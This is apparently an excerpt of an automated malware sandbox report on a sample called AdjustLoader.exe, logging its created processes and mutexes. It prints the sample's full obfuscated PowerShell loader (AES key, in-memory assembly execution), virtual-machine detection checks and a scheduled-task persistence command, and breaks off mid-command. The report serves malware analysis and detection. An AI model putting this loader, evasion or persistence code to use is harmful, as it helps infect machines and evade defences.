Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 51_2_004011AD SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString, 51_2_004011AD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 51_2_004017A5 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW, 51_2_004017A5
Source: C:\Users\user\Desktop\AdjustLoader.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AdjustLoader.exe.log
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1456:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\9539513
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\6624292
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3992:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5244:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\5549515
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5820:120:WilError_03
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7808
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\7506200
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\4353117
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5796
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1420
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5920:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\b9960528-a89f-46d9-ad7e-4161fbe34b93
Source: C:\Users\user\Desktop\AdjustLoader.exe File created: C:\Users\user\AppData\Local\Temp\tmp6432.tmp
Source: C:\Users\user\Desktop\AdjustLoader.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp6432.tmp.bat" "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "schtasks" /create /sc MONTHLY /tn $nya-Loli_1 /F /RL HIGHEST /tr "wscript.exe 'C:\Windows\$nya-onimai3\$nya-Loli.vbs' 'C:\Windows\$nya-onimai3\$nya-Loli.bat'"
Source: AdjustLoader.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: AdjustLoader.exe Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.65%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\AdjustLoader.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\AdjustLoader.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: AdjustLoader.exe Virustotal: Detection: 20%
Source: unknown Process created: C:\Users\user\Desktop\AdjustLoader.exe "C:\Users\user\Desktop\AdjustLoader.exe"
Source: C:\Users\user\Desktop\AdjustLoader.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp6432.tmp.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"Standard PC (Q35 + ICH9, 2009)" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Users\user\AppData\Local\Temp\tmp6432.tmp.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7808 -s 2540
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "schtasks" /create /sc MONTHLY /tn $nya-Loli_1 /F /RL HIGHEST /tr "wscript.exe 'C:\Windows\$nya-onimai3\$nya-Loli.vbs' 'C:\Windows\$nya-onimai3\$nya-Loli.bat'"
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-ScheduledTask -TaskName '$nya-Loli_1'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wscript.exe wscript.exe "C:\Windows\$nya-onimai3\$nya-Loli.vbs" "C:\Windows\$nya-onimai3\$nya-Loli.bat"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
Source: unknown Process created: C:\Windows\System32\wscript.exe wscript.exe "C:\Windows\$nya-onimai3\$nya-Loli.vbs" "C:\Windows\$nya-onimai3\$nya-Loli.bat"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"Standard PC (Q35 + ICH9, 2009)" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"Standard PC (Q35 + ICH9, 2009)" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Windows\$nya-onimai3\$nya-Loli.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1420 -s 2288
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Windows\$nya-onimai3\$nya-Loli.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1420 -s 2504
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$nya-Loli_1" /F
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5796 -s 2352
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5796 -s 2476
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$nya-Loli_1" /F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:TnoNKHHDUXvA{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wrAnTRmMMLZATy,[Parameter(Position=1)][Type]$iejhPFpNZp)$FisCHMOcbia=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+'e'+[Char](99)+'t'+'e'+''+'d'+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+'g'+'a'+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+'e'+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+'p'+'e',''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+','+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+'l'+[Char](101)+'d,'+'A'+''+'n'+'s'+[Char](105)+'C'+'l'+''+[Char](97)+''+'s'+'s,'+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+'C'+'l'+''+[Char](97)+''+'s'+''+'s'+'',[MulticastDelegate]);$FisCHMOcbia.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+[Char](101)+'c'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+'i'+''+'d'+'e'+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$wrAnTRmMMLZATy).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$FisCHMOcbia.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+',H'+[Char](105)+'d'+'e'+''+[Char](66)+'y'+'S'+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+''+'S'+'l'+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+'a'+''+[Char](108)+'',$iejhPFpNZp,$wrAnTRmMMLZATy).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+''+','+''+'M'+'a'+[Char](110)+'a'+'g'+''+'e'+''+[Char](100)+'');Write-Output $FisCHMOcbia.CreateType();}$beUOypwDoUbYD=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+[Char](115)+''+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType('M'+[Char](105)+'cro'+[Char](115)+''+'o'+'f'+'t'+'.'+'W'+''+[Char](105)+'n32'+[Char](46)+'U'+'n'+'s'+'a'+''+[Char](102)+''+'e'+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+'e'+'t'+''+'h'+'o'+[Char](100)
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{bd6193ea-62bd-4d0d-9eeb-00767b2d70f2}
Source: C:\Users\user\Desktop\AdjustLoader.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp6432.tmp.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"Standard PC (Q35 + ICH9, 2009)" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Users\user\AppData\Local\Temp\tmp6432.tmp.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "schtasks" /create /sc MONTHLY /tn $nya-Loli_1 /F /RL HIGHEST /tr "wscript.exe 'C:\Windows\$nya-onimai3\$nya-Loli.vbs' 'C:\Windows\$nya-onimai3\$nya-Loli.bat'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-ScheduledTask -TaskName '$nya-Loli_1'
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"Standard PC (Q35 + ICH9, 2009)" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX 